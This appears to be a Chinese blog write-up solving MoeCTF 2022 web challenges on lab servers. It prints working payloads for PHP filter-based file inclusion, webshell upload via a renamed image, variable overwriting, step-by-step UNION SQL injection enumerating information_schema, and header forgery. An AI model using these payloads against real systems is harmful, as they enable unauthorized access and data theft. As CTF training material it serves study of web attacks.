[MoeCTF 2022]——Web方向 wp

[MoeCTF 2022]baby_file

“海纳百川,有容乃大;壁立千仞,无欲则刚。” 寓意人要像大海能容纳无数江河水一样的胸襟宽广,以容纳和融合来对他人。(我们坤坤都这么努力了,你们为什么还要黑他 !!!?小黑子们真虾头!!)

???黑我家哥哥是吧

打开环境后源码如下

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
?>

看见有include函数了,可以想到是文件包含

但是这里并不能直接传入file的值等于index.php或者flag.php,所以要利用php伪协议

构造payload来读取index.php的内容

http://node3.anna.nssctf.cn:28899/?file=php://filter/read=convert.base64-encode/resource=index.php

访问后得到base64编码后的index.php

image-20230809014234491

解码base64解码得到源代码

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
?>

发现并没有什么隐藏的信息,所以再构造payload读取flag.php

http://node3.anna.nssctf.cn:28899/?file=php://filter/read=convert.base64-encode/resource=flag.php

image-20230809014528054

访问后得到编码后的flag,解码得到flag

image-20230809014539123

无语了,还黑我家哥哥是吧

[MoeCTF 2022]ezhtml

直接调试器看源代码就能得到flag了

image-20230809014702191

[MoeCTF 2022]what are y0u uploading?

can can need 马子???!

CTF的出题人总能来点炸裂的东西

一眼文件上传

image-20230809014806794

上传一句话木马,先尝试上传PHP文件

image-20230809014857881

前端拦截了,所以上传图片马

虽然经过burp抓包后可以通过修改文件后缀来上传php文件,但是不知道文件路径,不能getshell

image-20230809015145152

那就按照他要求上传一个f1ag.php

直接将图片马的名字改成f1ag.php,上传后得到flag

image-20230809015304204

[MoeCTF 2022]ezphp

源码


highlight_file('source.txt');
echo "<br><br>";

$flag = 'xxxxxxxx';
$giveme = 'can can need flag!';
$getout = 'No! flag.Try again. Come on!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($giveme);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($getout);
}

foreach ($_POST as $key => $value) {
    $$key = $value;
}

foreach ($_GET as $key => $value) {
    $$key = $$value;
}

echo 'the flag is : ' . $flag;

?>

考察变量覆盖

构造payload直接打

http://node2.anna.nssctf.cn:28665?cmd=flag&flag=cmd

得到flag

[MoeCTF 2022]Sqlmap_boy

F12可以看到hint

image-20230809020810274

这里提示了sql查询语句

 $sql = 'select username,password from users where username="'.$username.'" && password="'.$password.'";'; 

所以进行sql注入

观察注入语句,可以看出闭合方式是单引号和双引号'",试试万能密码

username=admin'" or 1=1;#&password=1

image-20230809021115997

这里的message是Unicode编码,解码一下

image-20230809021212339

登录成功后重定向到了secret.php?id=1,访问一下

http://node2.anna.nssctf.cn:28527/secrets.php?id=1

image-20230809021645891

猜测一下,这里id=1是注入点,试试联合注入,但是没啥用

http://node2.anna.nssctf.cn:28527/secrets.php?id=-1' union select 1,2,3 --+

好样的,啥都没过滤

image-20230809022013219

直接爆库就行了

http://node2.anna.nssctf.cn:28527/secrets.php?id=-1' union select 1,database(),3 --+

image-20230809022126205

爆表

http://node2.anna.nssctf.cn:28527/secrets.php?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='moectf' --+

image-20230809022300059

爆字段

http://node2.anna.nssctf.cn:28527/secrets.php?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='flag' --+

image-20230809022343488

获取数据

http://node2.anna.nssctf.cn:28527/secrets.php?id=-1' union select 1,database(),group_concat(flAg) from flag 

image-20230809022531753

得到flag

[MoeCTF 2022]cookiehead

RT

?没懂

上来告诉我们仅限本地访问

image-20230809022754658

XFF伪造

靶机有问题,打不了

正常来说是伪造X-Forwarded-For,为127.0.0.1

image-20230809024602651

看了眼别的师傅的wp,考察的很基础

XFF伪造完之后会回显

You are not from http://127.0.0.1/index.php !

然后进行Referer伪造

// 添加 Referer 头
Referer http://127.0.0.1/index.php

伪造完之后回显

请先登录

login=0改为login=1

God_of_Aim

游戏题,打完十个点后会获得前一半的flag

image-20230809025322898

然后在HTML里看见提示

image-20230809025626103

然后就去看aimTrainer.js的源码,可以发现一段与flag有关的代码

checkflag1() {
    if (this[_0x78bd[4]] == this[_0x78bd[5]]) {
        this[_0x78bd[20]]();
        alert(_0x78bd[21]);
        alert(_0x78bd[22]);
        this[_0x78bd[23]]()
    }
}
checkflag2() {
    if (this[_0x78bd[4]] == this[_0x78bd[5]]) {
        this[_0x78bd[20]]();
        alert(_0x78bd[24])
    }
}

看到alert,所以 F12 在控制台执行:

alert(_0x78bd[24])

拿到后半段flag

image-20230809025943670

拼一下

moectf{Oh_you_can_a1m_and_H4ck_Javascript}

后记

NSS 的靶机有问题,所以后两道题flag交不上,等什么时候好了再交

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值